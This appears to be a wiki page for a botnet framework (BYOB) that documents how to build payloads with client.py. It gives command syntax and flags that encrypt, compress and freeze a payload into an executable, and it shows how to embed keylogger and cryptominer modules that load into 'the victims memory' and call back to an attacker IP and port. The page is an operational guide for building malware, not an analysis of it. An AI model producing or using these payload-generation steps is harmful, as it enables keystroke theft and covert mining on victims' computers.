Skip to content

Generating a Payload

Malwared LLC edited this page May 15, 2020 · 4 revisions

client.py

  • Open up a terminal, or a command prompt, and navigate to your BYOB folder (ex. "cd desktop/byob-master/byob")

  • The syntax is "python client.py YourIp YourPort"

  • A simple command to generate a payload would be "python client.py 192.168.1.1 8080" where our external ip address is 192.168.1.1 and the port we wish to use is 8080
  • The port used to start the server and the port used to generate the payload must match

Arguments

  • "--help" Shows a help message and exits (ex. "python client.py --help")

  • "--name" Assigns a name to the payload (ex. "python client.py --name ThisIsTheNameOfThePayload 192.168.1.1 8080")

  • "--icon" upload image to file name (ex. "python client.py --icon IconNameHere 192.168.1.1 8080")

  • "--encrypt" Encrypt the payload with a random 128-bit key embedded in the payload's stager (ex. "python server.py --encrypt 192.168.1.1 8080")

  • "--compress" Zip-compress into a self-extracting python script (ex. "python server.py --compress 192.168.1.1 8080")

  • "--freeze" compile client into a standalone executable for the current host platform (ex. "python client.py --freeze 192.168.1.1 8080")

  • "--version" show program's version number and exit (ex. "python client.py --version 192.168.1.1 8080")

  • If you wish to use multiple parameters simply add them after each other separated by a space (ex. "python client.py --name TestBot --encrypt --compress --freeze 192.168.1.1 8080")

Module

  • Select one or more modules to remotely import at run-time

  • The syntax is "python client.py YourIp YourPort module YourChoiceOfModule"

  • A simple command to generate a payload that imports modules immediately would be "python client.py 192.168.1.1 8080 module keylogger miner" where our external ip address is 192.168.1.1, the port we wish to use is 8080, and we are importing the keylogger and miner modules into the victims memory on run-time
Clone this wiki locally